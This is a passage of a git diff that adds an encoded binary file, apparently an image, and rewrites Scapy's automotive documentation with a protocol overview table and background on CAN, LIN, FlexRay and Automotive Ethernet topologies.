z`drp1Ci+&s{x%bnOeCH!SO6)vMRI;i0#QNPNi0U-?tpi7rb(E1|IoXaqCo4k(^?H5 zUyjG%x8j({>-WQ(o*&!QfiD`P4qDtLvteloZ?P3Mi}}7(4eK=3Pw#dKAPkyh$=l2oDcm zsZtznselFg4IMGs2M!2ORzgxkTNK5>o+|rD#ks)k#S03;1r$`+hw<1@xst2TT)WZT2N)+iB2Kuy6WDw|(h`|`s{ zg0lcgJ-P(@ls825jSh{b%b)YmrSd?| zS_6Hi^SiIvb^9`)mk1i=VP*?RPCk*AAb6|ZKzu1c-SuD2-Sx{r3IycvtY_OP#&}^@ zjkfi4CXA$Gq@Al~)ANhYk(kB3$;LZ}R4z$I6LJI7g~u6=SKZS{P!eeTj%S{G3(zEb z2&Xof`vVIsAAv1i>Zyr#fX%0HO9KPSi4!LnNAi$K-eCP?u*}x-_(4eE%f;JP$&@YiRHf|tKD`7mc~^zl7GU$o)EMV|M@EIlTd9V;_PPH+s$mgi5S6TS^`AzrlzlX-K zr_Z0igN$zLLM+Qop1rMj+Tzx?m-MT3u`JLbdNvB7ctoP>SRK^#J= zJQ#)+d=!{k505YTTKN7MqCW&Yeth!cFu8#0*}WeV09Z-nu{`q;<9X1*0p0RQ0E6^3 zhTA&SXo#Dn4SUQX!|2(I7lp_alG*%gY{*Upb&B7$wfE}Goj1=0(xu0VUN9Yi;ZTBZ zHr219UljSu#)FeP0F_F@nSyjdK|!1r#mxfmJ8m^ek%OU|A1+f&#wCE(8!ohT>8guN zU~k4_i}-JHH2zsy*#cTPiG%lQuGSba2!%hXa19K48}2ZNgK>t8n=N&0Ap^ZP*EPpr zG#jjuF+9yf4?QPhaYY1;6dZvfv5!~+oW%~JwU7W%Eom;5k^Y@qR@@ajzUqgRx^Z6Ph%F2`Pzarr*uPj?nT!= zD#JHHy1#-_JE$k9X&;p;49O;ug8|9!9r|0UHM8v|tDyMkv<;NOUf0%^hUPeQ@Ujw| zi`r`uAKxQmN7OomBLM%Tsi|2tHh-zNFVs3#SkR!>Z_}s(9*O>i{=@=gefUFk?d&9l z)V(ebcGi-1ng;m223(TlNIR#<%`;RJ$w>6N@>+U!D}?fktzNUn8fPFuGUt-BEeSu9 zW4v$CiWLtAZ^KFfVh6sjMV__-x?Bvmp2qVpUbx`qiP3^v^Q7H->?^pOK|4O_cmFY; z0fB+|IhV4}Jr_USs4+dUf!G_XOJQL^;DqoyC($Sn9ed=!C(U6ZGFH&(G0V_f0pwOCEBa3 zED{Y1Su5aAEhsAs5}EXci9dDl01PJ3y@QE=HBGPR(DU#+adBa2e0Uxdm$ZHtyko{u zckak6C?hspW!EloekGg~umu)YLi|zk5zYE>hRz{mgY*m`4WAGaUx;(>H-a`i3m_Ov z%D`+HYBacmT7zdtc9PLo?nDs3DI%!jcMZn= zCmjxZ*%B@?5q@!K4OudvQ()-$$Djk^5H0Cs`b6fCZVZ^~_ImUn=pC}L@vBfD=Kvv8 zf_5j;Ad2R%jVJ4ul6nxS#L&Rt9Bz`B;Y^<%JZ~mUW)?&)5!@-^QBeWt8$JX^|3~)E zbEI_yBbVCm<*w2j~^G2{n`?v zEw3K20(8;wu!K;F>U}P#*@@BiI7-lc3TWYFDsDa6wzjK?Ew7_ejG{BU2yy5w2tIO_ z1bkG~ld5QDLW#+A{@BbTwmvI77wRrbjMApV>OK=Z@Q>KJAXyPWb#<9jXWKC|Gd}3MpWsI$m5nAF zqZ3+#1)V51^lw13hCmVq)H+w|`4zOdu+PR=Ah_xLI(n z*-VczoKD0@3FyyC03C`|$~iROqD@qcleHJrE>fN@gz(b5t*i&nh~(V8OCi1wloyhb zqa!0N*b_5jSeaxf7TW!%AB(ZzHQeNo-T=&AENaJ5WDA^revtThm_ZD9tfmTGlt zS&o+9uDl_;*Y9CPdocVrjN3i*%+od!v}B+IgEnhnIIIHDB-G`Cz4$m|4YsAPtT`<~ z^u__|yrBDORjF21Wge1B%kSbm8NTK&h*H5>VYjjf3lhzw-G!o+Hm-4*wz@Gie1HoHFb&r=x*;#vp^)+x@(h?LD z`xZ=8OwDsQcGnz3%lNs&@1sfyQuzeEpV1GjZt%+WB!e@s4D0_X`bsG}P7O`o!xrQW zB;$6h^<(wVADYcnj{e-~VUd)B;ONnosIH#7qjvVpUOIHsn!0<}E|?$yrj7*0C72nX zD!sazTl1Iz&tA#M8Ms|-bZfi}9G}5sGX<>v1k{&28a}VP)N`(W(1y+dB?_c7-F;`G z;GA{4sUXtz(1M+~^&@y(oHL-MY=w2nr(l;4>vDHJic7W=Cpy``t}5*iu^4oalb1J? z{LH-A4LVfW<(EGWLp|1beV#Zw19rnbQUF0{ujC}=nuo;vjkAyn5ZDxkl-8|F`O;}* z_%YSPr_(agNMgK5BUx1>2e}CB^f|P5FBDKbhy6y1TAYV=A%z6MY`5Mk;7zcgr_R9` zvdN)QJbB=I=@NqciAs!MLqHBJ3^q8XEInKuw6$~Bmqj@5<}A8x62ofO?7Zad}g%`G0`61X2?@7w8bwnpcMmV^B(vy}P9{KY?45J*MJWdionME!AV@^p#$a{ZOvP z1Li!<$j~JtwQp$q`X!`4fm<_4dLSiGUTX}^s)wMDcvqkwMS{P&qND^B0AO5AU2o7q zCdlqP3-$H&5wa-aw^En#@FW@URlbV@v&Ks7(YoSd9Q z{KG$v%N*w}uc$CF?_Z6s24amqH)}TKy8RkWW8>u?K7N$Pt;E(Y6BbTQa|Bpf&CWm; zDTJ?ABsl@wEFYRLshnq>D~fGJLFkaKZ^5UA*KxoAK{Q~$tRZUg)%F;RFFgjqE-m?f z(*0L>SrlRt8q#kloLEj)(qnx|ataWt0(5eaer^QoswiIi5iAwDuhC9DLQ}Ozy1A^- zA{9{lqj!6?lntKKoKa>wH+>#L<*vWkxd|u{1vEWVSRY4f;aHEn1nE#%T!*S*#t!OvEo=+g?V{oUo@?DH90D$|2d#8r9pvtQI~50a`V z--gXXcshX2z%lpsa=`@Y$2Px2ydipbR6V>_X&E*HNwzhMkQQzus%+1asjC3IZ!oSz z#|c%^ez^AyY`+Na*CTN_6FHG4osoegpabqt4#yDe|9Z8_1Q2g76sFti-e$(g9^UDO z{fGpa9)ps0wNIqY%NG&qK|+f7S219=F`CPkFaL(aVEj;wC_6$O#8}ZDs)MgEijk;< zrNsI{OYUHe`LR!T&ljCA8%PQNFe5WDxqBwzk#c3^|KUN2lG7A3x3mH#xH5 z1+;5{jV6~nd3?LghMVD}69?y*QNvz*?DeT3=mw){loyqD(~cY|@D>p0bnBbBI5?8H z%QJnaa|^7Z|1JVS3Z{!w#NV=Aw!OW5#$0Qhl8=>-X&t2q(Q3^WiJ8h8MQQBRT`CHV7*VzflQD5qjhYxj z3fZz{>GwJ_^ZkB*&+&VXj^p`j#*FIfy07c}oacKx)3zCmBOi-==%8iR!G|*f z4Xqt&Hp{2W#D+dzq50qv+O|J)mkXStGxfwF<67E>4D)i!I|nGou1g2I_un3)i@sWn z#}siGQR6puzk}Zs164sxMdZnoLj>0Oo40)& z-NLrnQ%=m;{kzsU09z4*_%|IqXpo!7*qfUDiPC8powfBPfR#uAMu3bB&Kgx)9U^Pf z*Z+et{HmcRE(Ef{TEM8ypMO2D%y!3r!%g(8hblnUnAu9amuFZnNmPb6`%gS%fD5@? zk_KU|=5Ow(Z{uTc4qoyFb?9yrB{{2-WW<5~*f7er?(BaeFH!2exQ5nbAz4T3m?^uM zud9vzPiRHGi^>(mT7BWdS8bmyp5UVMpK#C2M={=SoXQUw%B3 zyEvh&)qvbP-ZxvTXcAG&J0(UxnNXH~eCBs2Z#cxh*WFM3;*;pf5a(^m3$KNfRmg~i zaox%yqq< zbsfXO^+S^fs_7NH_Mb;-VL~K_D{XNN9g|*VH(-eaKJuKOmzFHpqwdtBXRS?Yr0N!49V9L|D?#j`2cKU{f zDN_#H#CMh2(Z;n`lv)*fLevM`h8ZVIueVq6QkZ=DfI5-@@!*r*YmBTKpv-h9FuJ|N zmeH#6I4xLUG%{J5Dl`UHingUl|F8+;>g8%e>8EiBBNRkg0tLTX zM0Gb)S0hDLjNtVa;)CZ&ah6NH#s|XzX;WNGzbSLDnw|!RQMyt+-X~stvG_6i%zOXR zSD-Qe3*46-o%h`*PYxA_1HaJYH0N+stOC2)$Nkm0)7kO8G@@-L#V0PKMmgOfR{|Suf>%P8z+rPrm!= zFQfa~^f(YiSA#0bHL#LcF^Z~n2hT&PLeOkiowCxO=Nr)G>y3ABBz-1j>iDKp)jFh} z_&zwbv@%}c*Y0JjcF!f2H)roTPwL~ zc6RMMN#D`U*gdkAs_<*U-qux+5Ih_&@Bf;dH_NCKPyB!%O+1h9;~bPBm*oep*UR-1 z!`BvcRGIbaqcn~mgE8eRTDuV=N3M3s~09w?hX)uDA_-jHd!_YBs1eA{T^3)KdOL*#Cp| ze#gfXaXne}FB&Kp_A_TV--vMC)K6{n^i{va+0-E+N%qxR#5veHLIY8iyTua7M;=@a zjc)P1;>W-xod=pB+iC6k^;_^?{5gb4d&x8J$rgNgNIf{)x5OW&E3j4@7Fug>bOkmS zn@RHVw&Qq-={A!-+)ER5^YUMSNv<_9mgGEfHAZb1I=PAY^j3~%R)z@)#2ZV%>W>$* zFE^54dI{l$Jro_dm^lIrs(CF*Qqw}{DVM;tksi^C?BQ?$*|Z1F8nNF|yzGy#8p{{b z*vtTJPz6ek6B7zeUOP_F=8@K`+ZfpGCkm*T`&YqnL} zGBI28ybG!eBks1`%gb{{yX#gz>j5q8eK+e4=LzCK&C1EK4)s5N(J(Qc zw_eBBh=~aWnt(=Or$%Son~zLRg04 zrQV+QQ!!F8V#?f`D)iWA+sNHL8AHwKjNN-K4 zJxUG7DJ|vzkYO1Ep3`TK*{S{%2?dyjp-45FH2;QFw@$p}e;n~?a(ih-EBsfD@H51h zdb4n4Xvm{g#2);%Yl!plKc_pK;ByLZW>Yh`x}qZKL<4m;!8Y{myB9N1X^t%$b?MTj z3LapfbeDt630b1M*6Z7MqS2M#ev30X@Gj_-Ol3}#W97u%L$wG^eOw%U z<>xKerDK+}cXN#8+}p#z1R0};t$61+akzm|Lqp4VgYbfrYpvH*Qr&4JA$n8q|9xq_ z=Gsri+rvwF;F4~e_&p=7>!6u7G55feKJR&>jg}UTBFyXP2g3!=gOLdv-B~|LwVW1O z;-@{b*9)gw5JECo-uVw_e`vnBU^y(!yc>Gywd!rZ=*3c>H2k==YsaZKv}bK%*ZDL^ zI(r}Ca#Wd^dx4Y1Adu?Y<|Nr0Q3;X_m#XU)i2;rQf+>PAt z=r?RHKE;i5VpgN)YE3bb17xWshac(}#*#zFxww5#INzu3r(u&GEQXNo8DFrzrdjMr?P1Ef ztY*SoJa|#Hreqxulry$c5@5hq6KOM|YMNQr0d0_V{T|1hPw_9bXDu~c@pT+xwDG8i0sFY1J6g8mY$ z4OK}5)sj%jX{&BKjgm8xoU+XlaRZ2qEqKJJCF?FvQ`c3^Mj#5;+fE@Ko)s_hJ7m40 z6{l$S4>7+iUjAztp5|3Y2?Ucwl10?k{_J1L(98XK(40GY(M&XMLrW+r04G!SCXBEf zfX^wr0lZ4p8;)%?Z4R#iErj_WpVv}Htn_hOa^f6O^zs4S>?I*KhG{APODwe~7-to3Kl zj(`!1wCWl^g{G#uQoq22mko8)fBBQ7`%;*jc?VzV(eQO+Rk;d z-Pe+cEIEQQ03nFE{Cj_;dn-O^!G9s-n=8mbvUYUTP-u2iZ3wiHum;8o$v_=5Jl!tk z?)#WMTes4}LjW|=42vj-gyF(8RfW4P)gh(9ilkI#l9=LkHwPq&TswsSTzM<<6191Fj??JJY0+Ja|v zH>__t^u%rt0mb)#gUETvr!wEIuJ(B1wegXQAc^7`6&D6Ln8?U5_B# z`p(0np#6U7lRne1ws@iyd$*&hvV*4PS)9W;w`A=Aqx;s3vu9(xPXgMu%*@PG?V8AB zr#K7ysg%u3B%A^-2BejufZkR2%%d@LbCV`b*ze_*avVtYf_aduBQKh=*EnhgQ_Z2jxO^$40q*D5H4 z^EH6>(R_C5*KE@LAidF!w3`PO*xTb+YQg8dK*b&j8H2v%H>ci;fTDE76u45X_{OQT zqh3Af@iA&v+z=58g8cPPC`=lF#BC5|!YIFQZ=>DJv;XH3uq=l=Ng=F5Qr9t6ljSiO zn#Gl@-essJCg8I`u-EuRabsNg{r7J`uT^oo(b{|^35Wu#6OY^?uf7+C7DJcRNYuwHaFWLfqjmUz6eZ)~#Dv3%NlkN@bM-V*Qp?g?$J6^h6b8OO@XE z(xXAR&?a^yk;}x@FzVO_cEPlEYm6OuuGy`a&u~j(OAC10eE3|NPrFuCoDSv%kHK*V zNbl9gH3D<>-81!{`jV41spj~YwkmMT{@}?~FSwR*gOv3UxFU(8qjC(&B}tGsN~b|* z>Q%Y3S=ftLuNq`p`sr$%cjr)@tYJ7Bb1*tS{&>tvDCk?`icIBfz+gz- z@7S{+eK#TsADB}3E~&jl(Qgg(m#vXg!(PW9Q%z+uqC4qbrahQ)Pf75*nc7CSO7Woi zyH|mECh`c0(sEVe&QTKdPo)rjta!A(4{)yP1;@uE*ydYVCE=gn_egg?ya}%0)<4KW{g5nxkt zwfXnU5n;p&{{e3{YRM1dZt{$hyf@cH{>R_a&IfZUnG-dv!z zpacy>?`$FiFmeT`8B4`q9MP$689RdVe*{lV1eVC!y|-Pvb|5BG?gbt_ae~cGppeEd z7P`=)T|>wcU5S(~l8RVRQ1|xPX1M9pBA`FnkmT!|V_nDl!_)|Yx_|M6*M{TFJn9ee ze)1gfTBL2%%WW~eLF4HKoPn-XxgpOw$0(IwHDg?1$)Fx#OpwVfsw4y%uFkaBYU%TR z9%@g?4rB+3{_s6tB1AS(cgOgmgLLz(JU#deYw!p1k9E}tNMSKdCHsiZ3lG zl7i9f2yjU$eNwe-N8@D5zW4?qTksXshUj_z|rU2DcEfYt7nix68hwF9ODLB1**o^Gy>n9UfLgN zT=D>gbk9ZEs1ynCpvg+JeZ8C2O!4uNsG2w${8infUz3Z_En>v<>4`4IoJwK>4_I`i zooa7xm5VPxC?x&(CQe7cQ2NQ2)T>-I8Wgux=VK=1GnRUd8?Njy+S$JAfSGEaUmp(l zKXeA=HJSFWPM`yr791SSui6b49M!s!;`FCCWfB7<(ta*0zAjW2Ez)ipn47!LE~ix+ zQ-A#E(MdZ~5?>{hKU$2~;F>AHxzC<6m#YUV-5HIM z`zl-74Aokrw>u;)KyNr@67(AVO~C8$4^Pca1B=I*3~tS-j0rO#<6I5LD=&wL=qo-h z_ToTlga&_i(sQ;6B?RStKwWn%?^l5z39{~HY&_n63EM%V7bDuy2Ye5mGR6MPqQ~t6 ziqgMg(9d2-0V0H;El%DP1!QE~w(akIkP`M6A8%;2D+EWvNZhRGeH(03<)_>$TWS9D+=ssJ z!mK(dACi5E!+n&7SF|mZ z#+vKfmbe&IP}A#Wy~VIA+I_Q}x~aWLdOGFH;%!y0ok zRquDVO?KAPD@UHdymsU5*iKUr2L%NO`@TA$5Xvpp_29PR=&w=CZ)~GVptZs_--%wq z{nVsUTmPf`ow?-Z<1!vBxv*Ov*-}h)#?B&zz@v~THy;#4c2A;T{9PKQU#B&d zetLNA`qU7k?n;&|A9ISTdkxeWO8)jb$9!c${rf|(Py=H^gnPa&QQr>@1mZ1 zvXGFudc=b+<9+Q*f?-C$^gO^eaay-VAaO|$MVk8DV-7BDX~E$YNqMrP`@|Ok8i3Yb zqix&o#W#RYPvqZpq;%G+ffdFU4hJx2*fSwRq{Q3u zbSlm(cEO2wR{Yf72YNGepq@^ee?3eqEHWf4tTDu*S*BG$?-U)CS#UQWwfx{iBSvl1 zR*}#pxQc)~j0-U6`P6VwCp_gB!G^j?jQQ@`<+ZoW;u-kw?gw%?@%)3sb6nS0hu>O zZjp}{@K|Qk{mO^5{ggFZL1@f8_AoPd?!gDyy_rub8*}R%|4As4z))TR;i90*{r^KP7Q0+v#yKhfeBq2 zA{5* znplV2jJul8*;U)z$rtX9Il{Tj@GYbbCu2;o!$B7#$rZ`=I?iY<3QGj2HYJmejWT2Z7`iM^KtmahiztqZ)0XUoVUj^EZyzI&kf>3j`xPKipLFo#^fiD?GO^6Mi6Qa`f}z@cSt4dE|)lh zUXXMgNSL|MLyVs3D zf0p`{>VB9EXj=Sp*dm@QS)r2_yh^oiWRn$y6J$M`&*=q#bNA^}llZDvOZ+FxfrU$o zZ`Y?!A6Y#l8%LwVZPwOay>DH|$tPORPK!eEqKMtEdMFM=0`{)|F+p&qr2GZ}fc1=h z^lq`A+89Oikl`R~3pal=N9jFZ&#T0KPv*pKE_~|!7&dz~l?RPdeu2SMIaHQHY}zDS zdn9vo?9(S4Z0QtmUD+0DttP?WMl5d{!GLlzZwc?LY*9THwBIT17pC*xE&CP@Tx?%Y z$XgRy3xDS|wEL)7Ck4-R_LQxfy}60Wp`ALX}e%Qd1Vk=$cJ~hnsxM3O)=fzX$UAlD1&YaSpi2BJI9;{qo ze&ET30RGnEcIac1?CTd*j$d`=fQYW#(6Z`V?O&UOgqO<-C&WXekN=Q>*Gp$mQ0kk9 zvXLo&!V+rqMi2YupX)cj`YG%kA6}8QC$QSe&+lhvJndwmgvPhaSn>Je`v8NTJFG(~ zW?%zRij0gD1XEtEm2*XMQe0e|b@jI|wzASd(xlIxKcD!A`Qc>OJu#V8OEy7i z&^)HP-G&diW!ER_qnC%%mwR3ZG(K(CtSC^f$H~JJw_p?bMsxg(G(O4NOB2ibe!6F! z13nX>A)JfC-rQq2&Ov2DV#+=o{q0XN6Co#O8Yy{q`kr;DgWXF-`P37D*opA+SUq?GDN4OG&J&u{h9Q;0g)Ym7<}k z86gaGnFgJQ7HC+2o(Vaf5G)DR!#jzZKo+HD_wvm7nYF^CRFi|eG3Zrt<(Zlt-NK0UR|}Z$WybbW{MFEJUHq2(XG{iGar3BEIK#m3jOtSyht4wy88oOJ|~5?f=Wbq z&ld%EpGg*_=nKWK2=G|qxtGz>to%`CMsB4|j^)aPZ5_V!SD73PxIiT2JUR3>KzKjD zYu#i9IP%j^HljEMT%pc220)Fu-Mj48E%s(--VAT@Xz#i1a*GcfqVz7A=Hs)P6G{rk z<4ceK?KEhi3tuzzPUlB2$@B8twJ@zTcAV$bkgE=T=X9T#+re_)9bLkm^BIVZ?XOS9{mH!(XX z!~1&WXi8)3X?Y9?MI;$F?Z%L%Xv3Nn|=>N5-JZ2#~_&qr=;pJgPyVP3#T=u zD{o^SX{;AfI;`g9QcD+%7~X?E{pzUa)%DESD;pSz=}6Bkf7>TQgFYr``<`cPebW2KZ8tqvVr-g2lWF}V9g zZZSgtv&5o3N2e)Mnz&TaqMt*39%7Io%-8G3Yk0>;s_lQF`~B>xcQma-MPl7hOAstc z&}wv{RRa#9y1E0@lM;NqAj&X3MlyqC-#N3H&gc(|dJ&gEhbnQwaxUR^tSR?&8|~@X zWPOU6>tXLM%y`ZgB@Ds%#xrk*sX9=x(H{@CusA5v@ENq}idBD0v7A4+H0rsd`puIA zq;+SHY_6dHjoiLno3qT&xNl*!5|$>bsuu`vR@I!S7FBicygaebg zf>G=u!E)rTKRI1v*Vt$uuw!-NTL zow~HM{)-&I_^;lg>Or(k|`kp3-7va>_Sz&wwx@IZ24rqAYakvDwwiu zxHjeE@R#?$)-m;4#dvnG=<1a#TW_nS;qo@x#yiZM;1d|=d9Tv|^0lK7Dy7E11(jk< zQOyX}3xm`X2%aMr4WVWWVI&mFi9QU-nQz2}{1+$Ax7D*JYY&v!Tkg~^a3{j)kzf4X z)B2h4H=?EK<(wi0W&{YVSaJ4@8n3pRu~WMFKe7WmP(CF|HQMS28k>sKoO|bicLau_5Fh0d#Ma1bU`^ZwK5`9W z(S-Sy6mGs;{CxZc$2ZHfPg5g*phos5s76Sn9vrnwhscPKeSVX{y88ySf;+UXG-~uO z-$_jQipg+-HF3)ZZU@H|N(_m*Y~U^Z_@c6^MOBX7%T@QRR?EgY@=es#Vycmg{&xkY z-FHcei5yybk&l3(f3;l1{&^dzaL)Z0#b1EDk5toZ=_d?AX$XYBy0o>AODgJ1PbI{p zmNws1(WApv!?o4{llp$89T{V5-hJJe922KRwU*}!_US*$It)ENMW-IL|ACJn_T8a}+db{DD&f5zT6Ue7Gzz8e+l>ABPD7@}E&6J=c%sLmcpO0q$Ln41~f zdFjK4*mWoEb$t_>OHaAIKIQ(oeldkAt5M1e>&p!=ot{1B@CQ(-%akd-58Oz5_;6Nk z*atUuSEOfV4%+=RXzpBhU{0p9Oc0cVd3lzP%(_~xNF`m2G!*;SuU}VJS350Qludb0 z*|Mc=ef_7WPoEm~?d$ICy@y!$!)67I=^Ysb?xGA&y<9znbGv8FY&Q3il7t*#~&lyq23wnkziR*0RVSs2I-72 z?nD}n%~|kZJw)}VvHc7U4eQRlmZeG%Dg3n(dL9>N=Oli+sNMe2zRJFAGA2CjI&B&9 zoguDnZbk+M27a>$eK#61Wb!v_YC05V|sM z*RDhCF7-mh*ki)3=T=J~VaALZqk?5ILsePdVHZC&fU2-yaOW}O$7fHeHUsvS5$twJF z@2atR2Aws&nnPSraF2-mzoH$1^|0BhpOE&VIdlYTwRx`V-Q4 z5H19RfNA+=4F~VT?&HUg@6RIXo_3*piTVXcfB&j!T?@|W%I(=8i=5vlc#lJ?>eDgB zKH>9Q?JbNBhf5B=d9zsVQ{N96X=&GG&A{6;@2xGLdw1W}j`NHEkL2qbJ zx)U~c^_9nO7M<|5-5jj{3B8I3S`Et;@46*i(HfL8Om{QciYQu5^Yin6eX!v5(1ZTX z!zPzMI5YEzeixfdjvH!oa)wIB66NEE>DZ`GpIK$kd+Muv^5?|r4&HiOr6RRZxz9df z<=*Hrc4A)M`(W`Yd9ZFwZ@1Sfd>hxkJaz?bLOkn-LJyJmaeu)P6BCmG>K8)7J;E1z z+J*dKs7k(LKAPKGx?s>7?)T@NC4bI2p`)YoeP*NM?exnx+OLV<-@fYV)vE!1elcZF zixH31azLa$E2x`lM_t%$;8mBq!GCV-oJGG*89jPUKwu!GT`%5(f_@ug&IHntU2By_ z3zL%kL)eNlm5k&c3m+HGxw7^f&rx+}v|{J*T?!mGg#6N8?)~Ok=C$pMm%Zt)ZgAhJ z(2_qDfnO~Whh%nk6`#0|L3vfk4&7IyLjRgm<}^?Fb_w^ld8}>|+Z=7agYD4sdMcl9 zonmV|?=1x&4zGRoA!|bDzIm}VAw$j3+1yaw3=R%Xv2Q)aET~&-pVxE$H(y@Xwfl3A zr=QolD3|AY=i`mJ8pN~5E3?}8LMv0%ho8y@B>rH(xlzMC($ep8SEK4k+jaJH0|Hdc z#FF}C^;w&=&jIQ-1WjkJsNppUEnhWpi!gSYJIGJ^~=vfptp^ zq`YG3L}8+hq(12&bRc?^&!PuG9sYQ|rD)mPU*jr^cvsQ&P=zN_7kNV5z-8*qKIHrl zw}>mBh$IvE)pgP&pVEcD^x3g+YZ+pz?{dA3d1AVOxE1(zJe~hN-ZO#qZvo!Qp<4t#X!+>vJtNl`3qA0U6I1iK>VQ?;*a^9y;>KH>8AR<>)tHf`{*+rB1KeAs_jsPLb1wfw6Y2R9AxwV d)<0gEzq4=JdfE0_{keFB!>9?inby<3|1XaDQ04#t literal 0 HcmV?d00001 diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index a4a1a08a9a9..83fc509df26 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -1,150 +1,284 @@ -********** -Automotive -********** +.. note:: This document is under a `Creative Commons Attribution - Non-Commercial - Share Alike 2.5 `_ license. +################################# +Automotive-specific Documentation +################################# + +.. sectionauthor:: Nils Weiss + +******** Overview -======== +******** .. note:: - All automotive related features work best on Linux systems. CANSockets and ISOTPSockets in Scapy are based on Linux kernel modules. - The python-can project is used to support CAN and CANSockets on other systems, besides Linux. - This guide explains the hardware setup on a BeagleBone Black. The BeagleBone Black was chosen because of its two CAN interfaces on the main processor. - The presence of two CAN interfaces in one device gives the possibility of CAN MITM attacks and session hijacking. - The Cannelloni framework turns a single board computer into a CAN-to-UDP interface, which gives you the freedom to run Scapy - on a more powerful machine. + All automotive-related features work best on Linux systems. CANSockets and ISOTPSockets are based on Linux kernel modules. The python-can project is used to support CAN and CANSockets on a wider range of operating systems and CAN hardware interfaces. Protocols ---------- +========= -The following table should give a brief overview about all automotive capabilities +The following table should give a brief overview of all the automotive-related capabilities of Scapy. Most application layer protocols have many specialized ``Packet`` classes. -These special purpose classes are not part of this overview. Use the ``explore()`` +These special-purpose ``Packets`` are not part of this overview. Use the ``explore()`` function to get all information about one specific protocol. -+---------------------+----------------------+--------------------------------------------------------+ -| OSI Layer | Protocol | Scapy Implementations | -+=====================+======================+========================================================+ -| Application Layer | UDS (ISO 14229) | UDS, UDS_*, UDS_TesterPresentSender | -| +----------------------+--------------------------------------------------------+ -| | GMLAN | GMLAN, GMLAN_*, GMLAN_TesterPresentSender | -| +----------------------+--------------------------------------------------------+ -| | SOME/IP | SOMEIP, SD | -| +----------------------+--------------------------------------------------------+ -| | BMW HSFZ | HSFZ, HSFZSocket | -| +----------------------+--------------------------------------------------------+ -| | OBD | OBD, OBD_S0X | -| +----------------------+--------------------------------------------------------+ -| | CCP | CCP, DTO, CRO | -| +----------------------+--------------------------------------------------------+ -| | XCP | XCPOnCAN, XCPOnUDP, XCPOnTCP, CTORequest, CTOResponse, | -| | | DTO | -+---------------------+----------------------+--------------------------------------------------------+ -| Transportation Layer| ISO-TP (ISO 15765-2) | ISOTPSocket, ISOTPNativeSocket, ISOTPSoftSocket | -| | | | -| | | ISOTPSniffer, ISOTPMessageBuilder, ISOTPSession | -| | | | -| | | ISOTPHeader, ISOTPHeaderEA, ISOTPScan | -| | | | -| | | ISOTP, ISOTP_SF, ISOTP_FF, ISOTP_CF, ISOTP_FC | -+---------------------+----------------------+--------------------------------------------------------+ -| Data Link Layer | CAN (ISO 11898) | CAN, CANSocket, rdcandump, CandumpReader | -+---------------------+----------------------+--------------------------------------------------------+ - - -CAN Layer -========= ++----------------------+----------------------+--------------------------------------------------------+ +| OSI Layer | Protocol | Scapy Implementations | ++======================+======================+========================================================+ +| Application Layer | UDS (ISO 14229) | UDS, UDS_*, UDS_TesterPresentSender | +| +----------------------+--------------------------------------------------------+ +| | GMLAN | GMLAN, GMLAN_*, GMLAN_[Utilities] | +| +----------------------+--------------------------------------------------------+ +| | SOME/IP | SOMEIP, SD | +| +----------------------+--------------------------------------------------------+ +| | BMW HSFZ | HSFZ, HSFZSocket, ISOTP_HSFZSocket | +| +----------------------+--------------------------------------------------------+ +| | OBD | OBD, OBD_S0[0-9A] | +| +----------------------+--------------------------------------------------------+ +| | CCP | CCP, DTO, CRO | +| +----------------------+--------------------------------------------------------+ +| | XCP | XCPOnCAN, XCPOnUDP, XCPOnTCP, CTORequest, CTOResponse, | +| | | DTO | ++----------------------+----------------------+--------------------------------------------------------+ +| Transportation Layer | ISO-TP (ISO 15765-2) | ISOTPSocket, ISOTPNativeSocket, ISOTPSoftSocket | +| | | | +| | | ISOTPSniffer, ISOTPMessageBuilder, ISOTPSession | +| | | | +| | | ISOTPHeader, ISOTPHeaderEA, ISOTPScan | +| | | | +| | | ISOTP, ISOTP_SF, ISOTP_FF, ISOTP_CF, ISOTP_FC | ++----------------------+----------------------+--------------------------------------------------------+ +| Data Link Layer | CAN (ISO 11898) | CAN, CANSocket, rdcandump, CandumpReader | ++----------------------+----------------------+--------------------------------------------------------+ + + +******************** +Technical Background +******************** + +Parts this section were published in a study report [10]_. + +Physical Protocols +================== + +More than 20 different communication protocols exist for the vehicle’s internal wired communication. Most vehicles make use of five to ten different protocols for their internal communication. The decision which communication protocol is used from an Original Equipment Manufacturer (OEM) is usually made by the trade-off between the costs for communication technology and the final car price. The four major communication technologies for inter-ECU communication are Controller Area Network (CAN), FlexRay, Local Interconnect Network (LIN), and Automotive Ethernet. For security considerations, these are the most relevant protocols for wired communication in vehicles. + +LIN +--- +LIN is a single wire communication protocol for low data rates. Actuators and sensors of a vehicle exchange information with an ECU, acting as a LIN master. Software updates over LIN are possible, but the LIN slaves usually do not need software updates because of their limited functionality. + +CAN +--- +CAN is by far the most used communication technology for inter-ECU communication in vehicles. In older or cheaper vehicles, CAN is still the primary protocol for a vehicle’s backbone communication. Safety-critical communication during a vehicle’s operation, diagnostic information, and software updates are transferred between ECUs over CAN. The lack of security features in the protocol itself, combined with the general use, makes CAN the primary protocol for security investigations. + +FlexRay +------- +The FlexRay consortium designed FlexRay as a successor of CAN. Modern vehicles have higher demands on communication bandwidth. By design, FlexRay is a fast and reliable communication protocol for inter-ECU communication. FlexRay components are more expensive than CAN components, leading to a more selective use by OEMs. + +Automotive Ethernet +------------------- +Recent upper-class vehicles implement Automotive Ethernet, the new backbone technology for internal vehicle communication. The rapidly grown bandwidth demands already replace FlexRay. The primary reasons for these demands are driver-assistant and autonomous-driving features. Only the physical layer (layer 1) of the Open Systems Interconnection (OSI) model distinguishes Ethernet (IEEE 802.3) from Automotive Ethernet (BroadR-Reach). This design decision leads to multiple advantages. For example, communication stacks of operating systems can be used without modification and routing, filtering, and firewall systems. Automotive Ethernet components are already cheaper than FlexRay components, which will lead to vehicle topologies, where CAN and Automotive Ethernet are the most used communication protocols. -How-To +Topologies +========== + +Line-Bus -------- -Send and receive a message over Linux SocketCAN:: +.. _fig-line-bus: - load_layer("can") - load_contrib('cansocket') +.. figure:: ../graphics/automotive/Simple-CAN-Bus-.png - socket = CANSocket(channel='can0') - packet = CAN(identifier=0x123, data=b'01020304') + Line-Bus network topology - socket.send(packet) - rx_packet = socket.recv() +The first vehicles with CAN bus used a single network with a line-bus topology. Some lower-priced vehicles still use one or two shared CAN bus networks for their internal communication nowadays. The downside of this topology is its vulnerability and the lack of network separation. All ECUs of a vehicle are connected on a shared bus. Since CAN does not support security features from its protocol definition, any participant on this bus can communicate directly with all other participants, which allows 